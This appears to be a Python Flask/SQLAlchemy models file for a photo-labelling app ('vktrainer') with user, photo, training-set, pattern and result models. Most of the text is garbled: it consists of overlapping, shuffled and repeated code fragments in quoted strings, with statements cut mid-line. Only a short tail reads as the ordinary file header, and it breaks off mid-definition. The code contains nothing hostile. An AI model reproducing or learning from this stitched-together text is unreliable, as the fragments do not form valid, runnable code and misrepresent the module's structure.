previous_photo: # We are already", "results If there aren't any, we serve a random photo \"\"\" photos_without_results =", "1)] else: nb_photos = self.photos.count() random_nb = random.randint(0, nb_photos - 1) return self.photos.all()[random_nb]", "@login_manager.user_loader def load_user(userid): return User.query.filter(User.id == userid).first() class Photo(db.Model): id = db.Column(db.Integer, primary_key=True)", "== 'linear': return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id", "self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): # Don't want to 
allow previous photo in semi", "self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo)", "json.loads(self.result) except ValueError: # Could not decode JSON loaded_result = None if loaded_result:", "db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) def", "self.photo.name, 'id': self.photo.id, }, 'user': self.user.name if self.user else None, 'result': result, 'id':", "count, ) def get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return", "instruction = db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position =", "We serve a random photo without any results If there aren't any, we", "previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first() if not previous_photo: # We are already at", "result_pk=self.id, ) def get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo marked as incorrect' else:", "db.session.commit() return user, True return user, False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id ==", "= self.photos.filter(Photo.id < photo.id).order_by('-id').first() if not previous_photo: # We are already at the", "_get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first() if not next_photo: # We are", "def create(cls, photo, training_set, user, result, **kwargs): training_result = cls( photo=photo, training_set=training_set, user=user,", "previous_photo = self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We serve a random", "cls.query.filter_by(md5=md5).first() if photo is not None: return None # We copy the file", "@classmethod def get_or_create(cls, name): user = cls.query.filter(cls.name == name).first() if not user: user", "import url_for, current_app as app from flask_login import UserMixin from sqlalchemy import func,", "copy the file _, filename = os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file,", "return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return", "= db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id", "loaded_result: result = { 'state': 'OK', 'value': loaded_result, } else: result = {", "get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard',", "def __str__(self): return self.name def get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return url_for('vktrainer.training_set_results',", "REF_TO_PATTERN_CLASS try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError: raise KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class 
TrainingResult(db.Model): id", "= db.Column(db.Boolean, default=False) def get_absolute_url(self): return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self):", "'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo marked as", "one next_photo = self.photos.order_by('id').first() return next_photo def _get_previous_photo_linear(self, photo): previous_photo = self.photos.filter(Photo.id <", "= cls.query.filter_by(md5=md5).first() if photo is not None: return None # We copy the", "get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return float(nb_photos_with_results) / nb_photos", "self.photos.count() random_nb = random.randint(0, nb_photos - 1) return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): #", "photos_without_results.count() if nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)] else: nb_photos = self.photos.count() random_nb", "import json import os import random from shutil import copyfile from flask import", "= db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set =", "not None: return None # We copy the file _, filename = os.path.split(file)", "check no photo with the same md5 already exists in db md5 =", "def get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return url_for('vktrainer.training_set_leaderboard', pk=self.id) def get_results(self): return", "flask_login import UserMixin from sqlalchemy import func, desc # from vktrainer import db,", "get_or_create(cls, name): user = cls.query.filter(cls.name == name).first() if not user: user = cls(name=name)", "vktrainer import db, app, login_manager from vktrainer import db, login_manager from vktrainer.utils import", "the last photo, we show the first one next_photo = self.photos.order_by('id').first() return next_photo", "db.Column(db.Integer) @property def pattern(self): from .patterns import REF_TO_PATTERN_CLASS try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError:", "_ = os.path.splitext(filename) photo = Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit() return photo def", "photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic'))", "user, True return user, False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id == userid).first() class", "- 1) return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): # Don't want to allow previous", "Photo(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) picture = db.Column(db.String(128)) md5 =", "None, 'result': result, 'id': self.id, 'url': self.get_absolute_url(), } @classmethod def create(cls, photo, training_set,", "no photo with the same md5 already exists in db md5 = get_md5(file)", "current_app as app from flask_login import UserMixin from sqlalchemy import func, desc #", "def 
get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def", "already at the first photo, we show the last one previous_photo = self.photos.order_by('-id').first()", "self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first() if", "_get_next_photo_semi_random(self, photo): \"\"\" We serve a random photo without any results If there", "self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results = photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results = photos_without_results.count()", "photo_is_incorrect = db.Column(db.Boolean, default=False) def get_absolute_url(self): return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def", "KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id'))", "= random.randint(0, nb_photos - 1) return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): # Don't want", "copyfile from flask import url_for, current_app as app from flask_login import UserMixin from", "}, 'user': self.user.name if self.user else None, 'result': result, 'id': self.id, 'url': self.get_absolute_url(),", "any results If there aren't any, we serve a random photo \"\"\" photos_without_results", "already exists in db md5 = get_md5(file) if check_if_exists: photo = cls.query.filter_by(md5=md5).first() if", "def _get_previous_photo_semi_random(self, photo): # Don't want to allow previous photo in semi random", "= db.Column(db.String(128)) md5 = db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/' @classmethod def create_from_file(cls, file, check_if_exists=True):", "import get_md5 photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class", "We are already at the last photo, we show the first one next_photo", "there aren't any, we serve a random photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id)", "db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) def __repr__(self): return self.name @classmethod def get_or_create(cls, name):", "random photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results = photos_without_results.filter(Photo.id", "TrainingPattern(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction", "primary_key=True) name = db.Column(db.String(64)) photos = db.dynamic_loader( 'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic')) def __str__(self):", "return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We serve a random photo without any", "db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', 
backref=db.backref('training_results', lazy='dynamic')) photo =", "def _get_next_photo_semi_random(self, photo): \"\"\" We serve a random photo without any results If", "class TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer,", "user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic')) photo = db.relation('Photo') user", "return None # We copy the file _, filename = os.path.split(file) path =", "app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING']", "'value': {}, } return { 'photo': { 'name': self.photo.name, 'id': self.photo.id, }, 'user':", "func, desc # from vktrainer import db, app, login_manager from vktrainer import db,", "import UserMixin from sqlalchemy import func, desc # from vktrainer import db, app,", "photo in semi random mode (breaks UX) return None class TrainingPattern(db.Model): id =", "We copy the file _, filename = os.path.split(file) path = os.path.join('vktrainer', cls.PICTURES_FOLDER, md5)", "check_if_exists: photo = cls.query.filter_by(md5=md5).first() if photo is not None: return None # We", "db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction = db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic'))", "return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo) else: return", "'user': self.user.name if self.user else None, 'result': result, 'id': self.id, 'url': self.get_absolute_url(), }", "} return { 'photo': { 'name': self.photo.name, 'id': self.photo.id, }, 'user': self.user.name if", "id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction =", "return user, True return user, False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id == userid).first()", "vktrainer import db, login_manager from vktrainer.utils import get_md5 photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer,", "self.id, 'url': self.get_absolute_url(), } @classmethod def create(cls, photo, training_set, user, result, **kwargs): training_result", "one previous_photo = self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We serve a", "db.Column(db.String(64)) position = db.Column(db.Integer) @property def pattern(self): from .patterns import REF_TO_PATTERN_CLASS try: return", "} @classmethod def create(cls, photo, training_set, user, result, **kwargs): training_result = cls( photo=photo,", "next_photo def _get_previous_photo_linear(self, photo): previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first() if not previous_photo: #", "class TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) photos = db.dynamic_loader( 'Photo',", "def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def 
get_next_photo(self,", "get_leaderboard(self): count = func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id, ).order_by( desc(count),", "'value': loaded_result, } else: result = { 'state': 'KO', 'value': {}, } return", "coding: utf-8 -*- import json import os import random from shutil import copyfile", "id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) photos = db.dynamic_loader( 'Photo', secondary=photos, backref=db.backref('training_sets',", "id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) def __repr__(self): return self.name @classmethod def", "allow previous photo in semi random mode (breaks UX) return None class TrainingPattern(db.Model):", "self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return float(nb_photos_with_results) / nb_photos * 100 def", "= db.relation('Photo') user = db.relation('User', lazy='joined', backref=db.backref('training_results')) result = db.Column(db.Text) # Result stored", "db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) name =", "@classmethod def create_from_file(cls, file, check_if_exists=True): # We check no photo with the same", "/ nb_photos * 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else:", "User.query.filter(User.id == userid).first() class Photo(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) picture", "id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id", "if loaded_result: result = { 'state': 'OK', 'value': loaded_result, } else: result =", "photo): \"\"\" We serve a random photo without any results If there aren't", "We are already at the first photo, we show the last one previous_photo", "db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', backref=db.backref('training_results', lazy='dynamic')) photo = db.relation('Photo')", "result = db.Column(db.Text) # Result stored in JSON photo_is_incorrect = db.Column(db.Boolean, default=False) def", "= self.photos.count() random_nb = random.randint(0, nb_photos - 1) return self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo):", "db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position = db.Column(db.Integer) @property def pattern(self): from", "< photo.id).order_by('-id').first() if not previous_photo: # We are already at the first photo,", "# Could not decode JSON loaded_result = None if loaded_result: result = {", "at the last photo, we show the first one next_photo = self.photos.order_by('id').first() return", "self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True) name", "photo: photos_without_results = photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results = photos_without_results.count() if nb_photos_without_results: return photos_without_results.all()[random.randint(0,", "random_nb = random.randint(0, nb_photos - 1) return 
self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): # Don't", "try: return REF_TO_PATTERN_CLASS[self.pattern_ref] except KeyError: raise KeyError('Unknown pattern: {}'.format(self.pattern_ref)) class TrainingResult(db.Model): id =", "random from shutil import copyfile from flask import url_for, current_app as app from", "nb_photos * 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else: return", "loaded_result = None if loaded_result: result = { 'state': 'OK', 'value': loaded_result, }", "login_manager from vktrainer.utils import get_md5 photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer,", "create_from_file(cls, file, check_if_exists=True): # We check no photo with the same md5 already", "if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo", "pattern: {}'.format(self.pattern_ref)) class TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id", "user: user = cls(name=name) db.session.add(user) db.session.commit() return user, True return user, False @login_manager.user_loader", "UserMixin from sqlalchemy import func, desc # from vktrainer import db, app, login_manager", "= photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results = photos_without_results.count() if nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results -", "= db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref = db.Column(db.String(64)) position = db.Column(db.Integer) @property def pattern(self):", "copyfile(file, path) name, _ = os.path.splitext(filename) photo = Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit()", ").values( User.name, count, ) def get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos =", "db.relation('Photo') user = db.relation('User', lazy='joined', backref=db.backref('training_results')) result = db.Column(db.Text) # Result stored in", "db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) picture = db.Column(db.String(128)) md5 = db.Column(db.String(64)) PICTURES_FOLDER =", "{}'.format(self.pattern_ref)) class TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id =", "from flask_login import UserMixin from sqlalchemy import func, desc # from vktrainer import", "if not next_photo: # We are already at the last photo, we show", "db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id = db.Column(db.Integer,", "from shutil import copyfile from flask import url_for, current_app as app from flask_login", "self.photo.id, }, 'user': self.user.name if self.user else None, 'result': result, 'id': self.id, 'url':", "db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id = db.Column(db.Integer, 
primary_key=True)", "db.Column(db.Text) # Result stored in JSON photo_is_incorrect = db.Column(db.Boolean, default=False) def get_absolute_url(self): return", "get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo) else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self,", "= db.Column(db.String(64)) picture = db.Column(db.String(128)) md5 = db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/' @classmethod def", "else: return self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first() if not", "else: try: loaded_result = json.loads(self.result) except ValueError: # Could not decode JSON loaded_result", "url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) photos =", "= os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path) name, _ = os.path.splitext(filename) photo = Photo(name=name,", "semi random mode (breaks UX) return None class TrainingPattern(db.Model): id = db.Column(db.Integer, primary_key=True)", "not decode JSON loaded_result = None if loaded_result: result = { 'state': 'OK',", "= Photo(name=name, md5=md5, picture=path) db.session.add(photo) db.session.commit() return photo def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5)", "def get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo marked as incorrect' else: try: loaded_result", "last photo, we show the first one next_photo = self.photos.order_by('id').first() return next_photo def", "db.relation('User', lazy='joined', backref=db.backref('training_results')) result = db.Column(db.Text) # Result stored in JSON photo_is_incorrect =", "photo, we show the last one previous_photo = self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self,", "db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer, db.ForeignKey('user.id')) training_set = db.relation('TrainingSet', backref=db.backref('training_results',", "# We are already at the last photo, we show the first one", "db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id')) user_id = db.Column(db.Integer,", "desc # from vktrainer import db, app, login_manager from vktrainer import db, login_manager", "@classmethod def create(cls, photo, training_set, user, result, **kwargs): training_result = cls( photo=photo, training_set=training_set,", "{ 'name': self.photo.name, 'id': self.photo.id, }, 'user': self.user.name if self.user else None, 'result':", "def _get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first() if not next_photo: # We", "= { 'state': 'KO', 'value': {}, } return { 'photo': { 'name': self.photo.name,", "self.photos.filter(Photo.id < photo.id).order_by('-id').first() if not previous_photo: # We are already at the first", "self.photos.order_by('-id').first() return previous_photo def _get_next_photo_semi_random(self, photo): \"\"\" We serve a random photo without", "lazy='dynamic')) def __str__(self): return self.name def get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return", "nb_photos - 1) return 
self.photos.all()[random_nb] def _get_previous_photo_semi_random(self, photo): # Don't want to allow", "check_if_exists=True): # We check no photo with the same md5 already exists in", "== userid).first() class Photo(db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) picture =", "url_for('vktrainer.training_set_leaderboard', pk=self.id) def get_results(self): return [tr.get_pretty_result() for tr in self.training_results.all()] def get_leaderboard(self): count", "photo with the same md5 already exists in db md5 = get_md5(file) if", "= db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction = db.Column(db.Text)", "name = db.Column(db.String(64)) instruction = db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref =", "try: loaded_result = json.loads(self.result) except ValueError: # Could not decode JSON loaded_result =", "the same md5 already exists in db md5 = get_md5(file) if check_if_exists: photo", "TrainingResult(db.Model): id = db.Column(db.Integer, primary_key=True) training_set_id = db.Column(db.Integer, db.ForeignKey('training_set.id')) photo_id = db.Column(db.Integer, db.ForeignKey('photo.id'))", "not previous_photo: # We are already at the first photo, we show the", "PICTURES_FOLDER = 'pictures/' @classmethod def create_from_file(cls, file, check_if_exists=True): # We check no photo", "md5) copyfile(file, path) name, _ = os.path.splitext(filename) photo = Photo(name=name, md5=md5, picture=path) db.session.add(photo)", "get_md5 photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin,", "not user: user = cls(name=name) db.session.add(user) db.session.commit() return user, True return user, False", "= db.Column(db.Integer, db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction = db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns',", "the first photo, we show the last one previous_photo = self.photos.order_by('-id').first() return previous_photo", "exists in db md5 = get_md5(file) if check_if_exists: photo = cls.query.filter_by(md5=md5).first() if photo", "db.ForeignKey('training_set.id')) name = db.Column(db.String(64)) instruction = db.Column(db.Text) training_set = db.relation('TrainingSet', backref=db.backref('patterns', lazy='dynamic')) pattern_ref", ") def get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id)) ).count() nb_photos = self.photos.count() return float(nb_photos_with_results)", "= func.count(TrainingResult.id) return self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id, ).order_by( desc(count), ).values( User.name,", "db, login_manager from vktrainer.utils import get_md5 photos = db.Table('training_set_photos', db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')), db.Column('photo_id',", "nb_photos_without_results: return photos_without_results.all()[random.randint(0, nb_photos_without_results - 1)] else: nb_photos = self.photos.count() random_nb = random.randint(0,", "__repr__(self): return self.name @classmethod def get_or_create(cls, name): user = cls.query.filter(cls.name == name).first() if", 
"photo.id).order_by('-id').first() if not previous_photo: # We are already at the first photo, we", "utf-8 -*- import json import os import random from shutil import copyfile from", "self.training_results.join( TrainingResult.user, ).add_column( count, ).group_by( TrainingResult.user_id, ).order_by( desc(count), ).values( User.name, count, ) def", "db md5 = get_md5(file) if check_if_exists: photo = cls.query.filter_by(md5=md5).first() if photo is not", "photo, training_set, user, result, **kwargs): training_result = cls( photo=photo, training_set=training_set, user=user, result=result, **kwargs", "to allow previous photo in semi random mode (breaks UX) return None class", "# We check no photo with the same md5 already exists in db", "we show the first one next_photo = self.photos.order_by('id').first() return next_photo def _get_previous_photo_linear(self, photo):", "import db, app, login_manager from vktrainer import db, login_manager from vktrainer.utils import get_md5", "User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) def __repr__(self): return self.name", "db, app, login_manager from vktrainer import db, login_manager from vktrainer.utils import get_md5 photos", "db.session.add(user) db.session.commit() return user, True return user, False @login_manager.user_loader def load_user(userid): return User.query.filter(User.id", "show the first one next_photo = self.photos.order_by('id').first() return next_photo def _get_previous_photo_linear(self, photo): previous_photo", "a random photo \"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results =", "{ 'state': 'OK', 'value': loaded_result, } else: result = { 'state': 'KO', 'value':", "'KO', 'value': {}, } return { 'photo': { 'name': self.photo.name, 'id': self.photo.id, },", "def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class TrainingSet(db.Model): id = db.Column(db.Integer, primary_key=True) name =", "same md5 already exists in db md5 = get_md5(file) if check_if_exists: photo =", "next_photo = self.photos.order_by('id').first() return next_photo def _get_previous_photo_linear(self, photo): previous_photo = self.photos.filter(Photo.id < photo.id).order_by('-id').first()", "return url_for( 'vktrainer.training_set_result', training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo", "if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self.photos.order_by('id').first() else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if", "= db.Column(db.String(64)) PICTURES_FOLDER = 'pictures/' @classmethod def create_from_file(cls, file, check_if_exists=True): # We check", "= self.photos.count() return float(nb_photos_with_results) / nb_photos * 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] ==", "\"\"\" photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results = photos_without_results.filter(Photo.id != photo.id)", "def get_absolute_url(self): return url_for('vktrainer.training_set', pk=self.id) def get_results_url(self): return url_for('vktrainer.training_set_results', pk=self.id) def get_leaderboard_url(self): return", "os.path.join('vktrainer', cls.PICTURES_FOLDER, md5) copyfile(file, path) name, _ = os.path.splitext(filename) 
photo = Photo(name=name, md5=md5,", "self._get_next_photo_semi_random(photo) def _get_next_photo_linear(self, photo): next_photo = self.photos.filter(Photo.id > photo.id).order_by('id').first() if not next_photo: #", "result, **kwargs): training_result = cls( photo=photo, training_set=training_set, user=user, result=result, **kwargs ) db.session.add(training_result) db.session.commit()", "return photo def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', pk=self.id) class", "= db.Column(db.String(64)) position = db.Column(db.Integer) @property def pattern(self): from .patterns import REF_TO_PATTERN_CLASS try:", "next_photo: # We are already at the last photo, we show the first", "photos = db.dynamic_loader( 'Photo', secondary=photos, backref=db.backref('training_sets', lazy='dynamic')) def __str__(self): return self.name def get_absolute_url(self):", "photos_without_results = self.photos.filter(~Photo.id.in_( self.training_results.with_entities(TrainingResult.photo_id) )) if photo: photos_without_results = photos_without_results.filter(Photo.id != photo.id) nb_photos_without_results", "at the first photo, we show the last one previous_photo = self.photos.order_by('-id').first() return", "cls.PICTURES_FOLDER, md5) copyfile(file, path) name, _ = os.path.splitext(filename) photo = Photo(name=name, md5=md5, picture=path)", "return float(nb_photos_with_results) / nb_photos * 100 def get_first_photo(self): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return", "class User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) name = db.Column(db.String(64)) def __repr__(self): return", "_get_previous_photo_semi_random(self, photo): # Don't want to allow previous photo in semi random mode", "if not user: user = cls(name=name) db.session.add(user) db.session.commit() return user, True return user,", "'state': 'KO', 'value': {}, } return { 'photo': { 'name': self.photo.name, 'id': self.photo.id,", "def load_user(userid): return User.query.filter(User.id == userid).first() class Photo(db.Model): id = db.Column(db.Integer, primary_key=True) name", "{}, } return { 'photo': { 'name': self.photo.name, 'id': self.photo.id, }, 'user': self.user.name", "db.ForeignKey('training_set.id')), db.Column('photo_id', db.Integer, db.ForeignKey('photo.id')) ) class User(UserMixin, db.Model): id = db.Column(db.Integer, primary_key=True) name", "else: return self._get_next_photo_semi_random(None) def get_next_photo(self, photo): if app.config['SHOW_PICTURES_ORDERING'] == 'linear': return self._get_next_photo_linear(photo) else:", "loaded_result = json.loads(self.result) except ValueError: # Could not decode JSON loaded_result = None", "picture=path) db.session.add(photo) db.session.commit() return photo def get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return", "TrainingResult.user_id, ).order_by( desc(count), ).values( User.name, count, ) def get_percentage_done(self): nb_photos_with_results = self.photos.filter( Photo.id.in_(self.training_results.with_entities(TrainingResult.photo_id))", "training_set_pk=self.training_set.id, result_pk=self.id, ) def get_pretty_result(self): if self.photo_is_incorrect: result = 'Photo marked as incorrect'", "with the same md5 already exists in db md5 = get_md5(file) if check_if_exists:", "get_path(self): return os.path.join(self.PICTURES_FOLDER, self.md5) def get_absolute_url(self): return url_for('vktrainer.show_photo', 
# -*- coding: utf-8 -*-
import json
import os
import random
from shutil import copyfile

from flask import url_for, current_app as app
from flask_login import UserMixin
from sqlalchemy import func, desc

# from vktrainer import db, app, login_manager
from vktrainer import db, login_manager
from vktrainer.utils import get_md5


photos = db.Table(
    'training_set_photos',
    db.Column('training_set_id', db.Integer, db.ForeignKey('training_set.id')),
